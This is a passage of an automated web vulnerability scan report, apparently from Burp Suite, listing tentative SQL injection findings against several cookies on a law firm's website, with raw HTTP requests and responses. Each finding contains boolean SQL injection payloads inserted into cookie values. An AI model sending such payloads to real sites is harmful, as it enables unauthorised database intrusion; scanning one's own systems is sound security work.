<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.17. http://www.pillsburylaw.com/ [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 39331056'%20or%201%3d1--%20 and 39331056'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.139331056'%20or%201%3d1--%20; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 16:09:33 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.139331056'%20or%201%3d2--%20; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819578;path=/
Set-Cookie: CFTOKEN=19658861;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.18. http://www.pillsburylaw.com/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 20657778%20or%201%3d1--%20 and 20657778%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704620657778%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:52:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 19:52:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704620657778%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:52:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.19. http://www.pillsburylaw.com/ [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 20149939'%20or%201%3d1--%20 and 20149939'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman20149939'%20or%201%3d1--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 16:09:42 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman20149939'%20or%201%3d2--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819600;path=/
Set-Cookie: CFTOKEN=46396247;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.20. http://www.pillsburylaw.com/ [hsfirstvisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 27618018'%20or%201%3d1--%20 and 27618018'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4627618018'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 16:10:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4627618018'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819704;path=/
Set-Cookie: CFTOKEN=62527523;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.21. http://www.pillsburylaw.com/ [hubspotdt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 14667953'%20or%201%3d1--%20 and 14667953'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4114667953'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 16:09:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4114667953'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819615;path=/
Set-Cookie: CFTOKEN=31184202;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


